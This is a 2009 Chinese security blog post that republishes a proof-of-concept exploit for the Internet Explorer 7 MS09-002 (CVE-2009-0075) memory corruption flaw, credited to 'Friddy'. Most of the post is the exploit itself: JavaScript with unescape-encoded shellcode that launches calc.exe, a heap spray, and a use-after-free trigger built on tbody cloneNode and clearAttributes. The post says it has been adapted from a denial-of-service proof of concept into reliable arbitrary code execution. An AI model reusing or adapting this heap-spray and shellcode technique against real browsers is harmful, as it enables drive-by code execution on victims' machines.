夜火博客

IE 7 Exploit MS09-002内存破坏漏洞利用程序

2009-02-20
漏洞信息
IE
漏洞信息
exploit
2分钟
293字

注:浏览本文杀毒软件可能会报毒,夜火的瑞星是报了,不过 IE 7 Exploit MS09-002内存破坏漏洞利用程序 的JavaScript代码是直接以文本形式贴出来的,不会运行,大家可以放心浏览

Microsoft IE CFunctionPointer函数内存破坏漏洞(MS09-002) 发布时间:2009-02-10 影响版本: Microsoft Internet Explorer 7.0

漏洞描述: BUGTRAQ ID: 33627 CVE(CAN) ID: CVE-2009-0075

Comment by Friddy: 这个实际不是个破坏内存的漏洞,可以利用这个漏洞执行任意的代码。 今天我花了十几分钟修改了miliw0rm的只会造成DOS的POC,现在已经可以较为稳定执行任意代码。

测试平台: Windows XP SP2+Internet Explorer 7.0

下面发出POC给各位安全爱好者测试,测试效果是弹出Windows的计算器(calc.exe)

1
<script language="JavaScript">
2
var shellcode=unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
3
4
var array = new Array();
5
6
var ls = 0x100000-(shellcode.length*2+0x01020);
7
8
var b = unescape("%u0D0D%u0D0D");
9
while(b.length<ls) { b+=b;}
10
var lh = b.substring(0,ls/2);
11
delete b;
12
13
for(i=0; i<0xD0; i++) {
14
array[i] = lh + shellcode;
15
}
14 collapsed lines
16
17
CollectGarbage();
18
19
var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
20
var a1 = new Array();
21
for(var x=0;x<500;x++) a1.push(document.createElement("img"));
22
o1=document.createElement("tbody");
23
o1.click;
24
var o2 = o1.cloneNode();
25
o1.clearAttributes();
26
o1=null; CollectGarbage();
27
for(var x=0;x<a1.length;x++) a1[x].src=s1;
28
o2.click;
29
</script>

作者:Friddy

本文标题:IE 7 Exploit MS09-002内存破坏漏洞利用程序
文章作者:夜火
发布时间:2009-02-20